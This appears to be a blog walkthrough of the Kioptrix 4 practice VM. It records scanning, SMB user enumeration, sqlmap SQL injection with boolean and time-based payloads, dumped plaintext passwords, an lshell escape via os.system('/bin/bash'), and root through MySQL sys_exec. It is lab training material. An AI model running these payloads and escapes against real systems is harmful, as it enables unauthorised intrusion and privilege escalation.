Starting with a quick scan:
nmap -Pn -T4 192.168.79.0/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-06 08:48 ADT
Nmap scan report for 192.168.79.217
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:CF:86:2E (VMware)
My goal today is to do this box as fast as possible.
Going to the webpage:
Running Nikto:
nikto -host http://192.168.79.217 -output nikto.txt
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.79.217
+ Target Hostname: 192.168.79.217
+ Target Port: 80
+ Start Time: 2019-06-06 08:52:20 (GMT-3)
—————————————————————————
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fas
hion to the MIME type
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.i
t/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current relea
se for each branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests t
hat contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 07:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2019-06-06 08:52:34 (GMT-3) (14 seconds)
—————————————————————————
Then gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.79.217 -o gobuster.txt
/index (Status: 200)
/images (Status: 301)
/member (Status: 302)
/logout (Status: 302)
/john (Status: 301)
/robert (Status: 301)
/server-status (Status: 403)
While it’s running, I send the page to Burp:
POST /checklogin.php HTTP/1.1
Host: 192.168.79.217
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.79.217/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: PHPSESSID=cca8c9b6b000df9f7870bbf98bdba878
Connection: close
Upgrade-Insecure-Requests: 1
myusername=erik&mypassword=erik&Submit=Login
Response:
HTTP/1.1 200 OK
Date: Thu, 06 Jun 2019 08:59:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Content-Length: 109
Connection: close
Content-Type: text/html
Wrong Username or Password<form method=”link” action=”index.php”><input type=submit value=”Try Again”></form>
Not much there
Scanning for SMB vuln:
nmap -p 445 -vv –script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.79.217
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
Nothing
running dotdotpwn (Directory traversal) in the meantime and intruder on Burp for SQL injection.
Scanning SMB shares:
nmap -p 445 -vv –script=smb-enum-shares.nse,smb-enum-users.nse 192.168.79.217
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 00:0C:29:CF:86:2E (VMware)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.79.217\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.79.217\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Maybe something.
smbclient //192.168.79.217/IPC$
Enter WORKGROUP\root’s password:
Anonymous login successful
Try “help” to get a list of possible commands.
smb: \> dir
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Nothing there
Trying Null connectrpcclient -U "" 1
92.168.79.217
Seems to be working.
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
We now have a list of users!
We can start to trying cracking the password:
wfuzz -w /usr/share/seclists/Passwords/darkc0de.txt -d “myusername=john&mypassword=FUZZ&Submit=Login” –hc 200 -u http://192.168.79.217
Also trying hydra on ssh:
hydra -l john -P darkc0de.txt 192.168.79.217 ssh
Both returned nothing
Trying sqlmap:
sqlmap –level 3 –risk 3 -u http://192.168.79.217/checklogin.php –data “myusername=erik&mypassword=password&Submit=Login” –method POST –dbms MYSQL
[11:45:49] [INFO] checking if the injection point on POST parameter ‘mypassword’ is a false positive
POST parameter ‘mypassword’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2297 HTTP(s) requests:
—
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause
Payload: myusername=erik&mypassword=-4226′ OR 5600=5600– bMfZ&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: myusername=erik&mypassword=password’ OR SLEEP(5)– WzXE&Submit=Login
—
[11:46:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[11:46:01] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.79.217’
[*] ending @ 11:46:01 /2019-06-06/
qlmap got a 302 redirect to ‘http://192.168.79.217:80/login_success.php?username=erik’. Do you want to follow? [Y/n] n
1
[11:51:00] [INFO] retrieved: members
[11:51:00] [INFO] fetching columns for table ‘members’ in database ‘members’
[11:51:00] [INFO] retrieved: 3
[11:51:00] [INFO] retrieved: id
[11:51:01] [INFO] retrieved: username
[11:51:01] [INFO] retrieved: password
[11:51:01] [INFO] fetching entries for table ‘members’ in database ‘members’
[11:51:01] [INFO] fetching number of entries for table ‘members’ in database ‘members’
[11:51:01] [INFO] retrieved: 2
[11:51:02] [INFO] retrieved: 1
[11:51:02] [INFO] retrieved: MyNameIsJohn
[11:51:02] [INFO] retrieved: john
[11:51:03] [INFO] retrieved: 2
[11:51:03] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[11:51:04] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+—-+———-+———————–+
| id | username | password |
+—-+———-+———————–+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+—-+———-+———————–+
I tried john and I can login but then nothing:
Same for Robert…
Trying ssh:
ssh john@192.168.79.217
The authenticity of host ‘192.168.79.217 (192.168.79.217)’ can’t be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.79.217’ (RSA) to the list of known hosts.
john@192.168.79.217’s password:
Welcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
john:~$
Bingo!
But both are very restricted. only a few commands available:
elcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
robert:~$ cd /home/robert
robert:~$ ll
total 0
robert:~$ help
cd clear echo exit help ll lpath ls
robert:~$ lpath
Allowed:
/home/robert
Trying to create a file
robert:~$ echo “1”>1.txt
*** forbidden syntax -> “echo “1”>1.txt”
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
robert:~$ echo 1
1
robert:~$ echo <?php phpinfo()?>
*** forbidden syntax -> “echo <?php phpinfo()?>”
*** Kicked out
Looks like SMB password is the same:
root@kali:~/boxes/kioptrix# smbclient -U john //192.168.79.217/IPC$
Enter WORKGROUP\john’s password:
Try “help” to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
but then nothing…
Trying the printer:
smbclient -U robert //192.168.79.217/print$
Enter WORKGROUP\robert’s password:
Try “help” to get a list of possible commands.
smb: \> dir
. D 0 Sat Feb 4 10:57:48 2012
.. D 0 Sat Feb 4 11:16:24 2012
W32X86 D 0 Mon Mar 9 07:25:45 2009
WIN40 D 0 Mon Mar 9 07:25:45 2009
4916892 blocks of size 1024. 3581296 blocks available
Went back to lshell…
Found a way to escalate:
ssh john@192.168.79.217
john@192.168.79.217’s password:
Welcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
john:~$ echo os.system(‘/bin/bash’)
john@Kioptrix4:~$ ll
bash: ll: command not found
john@Kioptrix4:~$ alias ll=”ls -al”
john@Kioptrix4:~$ ll
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw——- 1 john john 61 2012-02-04 23:31 .bash_history
-rw-r–r– 1 john john 220 2012-02-04 18:04 .bash_logout
-rw-r–r– 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r–r– 1 john john 312 2019-06-06 08:46 .lhistory
-rw-r–r– 1 john john 586 2012-02-04 18:04 .profile
Weird…. The flag is readable by everyone:
cd /root
john@Kioptrix4:/root$ ll
total 44
drwxr-xr-x 4 root root 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw——- 1 root root 59 2012-02-06 20:24 .bash_history
-rw-r–r– 1 root root 2227 2007-10-20 07:51 .bashrc
-rw-r–r– 1 root root 625 2012-02-06 10:48 congrats.txt
-rw-r–r– 1 root root 1 2012-02-05 10:38 .lhistory
drwxr-xr-x 8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12
-rw——- 1 root root 1 2012-02-05 10:38 .mysql_history
-rw——- 1 root root 5 2012-02-06 18:38 .nano_history
-rw-r–r– 1 root root 141 2007-10-20 07:51 .profile
drwx—— 2 root root 4096 2012-02-06 11:43 .ssh
john@Kioptrix4:/root$ cat congrats.txt
Congratulations!
You’ve got root.
There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven’t already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
——————————–
So still searching!
Mysql is running as root:
mysql> select sys_exec(‘id > /tmp/out; chown john.john /tmp/out’);
+—————————————————–+
| sys_exec(‘id > /tmp/out; chown john.john /tmp/out’) |
+—————————————————–+
| NULL |
+—————————————————–+
1 row in set (0.02 sec)
mysql> \! sh
$ cat /tmp/out
uid=0(root) gid=0(root)
$ cd /root
$ ls
congrats.txt lshell-0.9.12
$ cat congrats.txt
Congratulations!
You’ve got root.
There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven’t already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret